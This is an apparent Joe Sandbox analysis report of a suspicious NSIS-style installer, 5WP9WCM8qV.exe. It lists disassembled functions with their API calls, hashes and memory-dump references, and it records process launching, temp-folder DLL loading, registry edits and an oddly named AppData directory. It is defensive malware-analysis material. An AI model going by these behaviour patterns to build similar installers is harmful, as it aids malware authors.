Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004051B4: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,0040318B,0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Part of subcall function 00405735: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 1a98362bca4db66e1e19a0324b651a5f38e2de0179efdcb995dc5396ff982919
Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
Opcode Fuzzy Hash: 1a98362bca4db66e1e19a0324b651a5f38e2de0179efdcb995dc5396ff982919
Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 00405AC2
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes, xrefs: 00401638

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes
API String ID: 1892508949-2994632085
Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D

Function 00405735 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
CloseHandle.KERNEL32(0040A300), ref: 0040576B

Strings

Error launching installer, xrefs: 00405748

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78

Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 004051B4: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,0040318B,0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D

Function 00401B37 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(006BD0B8), ref: 00401BA7
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9

Strings

Call, xrefs: 00401B5E, 00401B64, 00401B7E

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
Instruction ID: 27804974e3ca03393c04398de70bc6092cde1ed56c9d8f76027c1228d60f226a
Opcode Fuzzy Hash: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
Instruction Fuzzy Hash: 32219072600101EBCB10EFA4CE85E5F77BAAF45324725413BF116B32D1DA78A8519B1D

Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,000002CA,00000000,00000022,00000000,?,?), ref: 00402CF1

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse2681.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69

Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000), ref: 10002963
GetLastError.KERNEL32 ref: 10002A6A

Memory Dump Source

Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55

Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,000002CA,00000000,00000022,00000000,?,?), ref: 00402CF1

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse2681.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C

Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,000002CA,00000000,00000022,00000000,?,?), ref: 00402CF1

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
RegCloseKey.ADVAPI32(00000000), ref: 00402347

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 38c1c2e2910efdab77a0f506319982341923413d10215031dfad05f280175cff
Instruction ID: c2222f3894d46b01c01a36c2377af854b7dcf2fa525412944523e76cc0079291
Opcode Fuzzy Hash: 38c1c2e2910efdab77a0f506319982341923413d10215031dfad05f280175cff
Instruction Fuzzy Hash: 2DF04F32A04110ABEB11BFB59B4EABE72699B80314F15803BF501B71D5D9FC99015629

Function 00405287 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405297

Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177

OleUninitialize.OLE32(00000404,00000000), ref: 004052E3

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 284ed0bdb174dded287a17afd61ba591e3d7c1dcaafaf06757c609fafc5d4012
Instruction ID: 8fb8f8de99d5f56c4d821e97e238feb66d9b0dc6248f5ee9fd766251fcc57a44
Opcode Fuzzy Hash: 284ed0bdb174dded287a17afd61ba591e3d7c1dcaafaf06757c609fafc5d4012
Instruction Fuzzy Hash: FFF0FA769006009BE30057A4AD01BA372A8EFD4321F19407EFE84B62E1CB79A8808E2D

Function 0040642B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
GetProcAddress.KERNEL32(00000000,?), ref: 00406458

Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E

Function 00405C2A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\5WP9WCM8qV.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
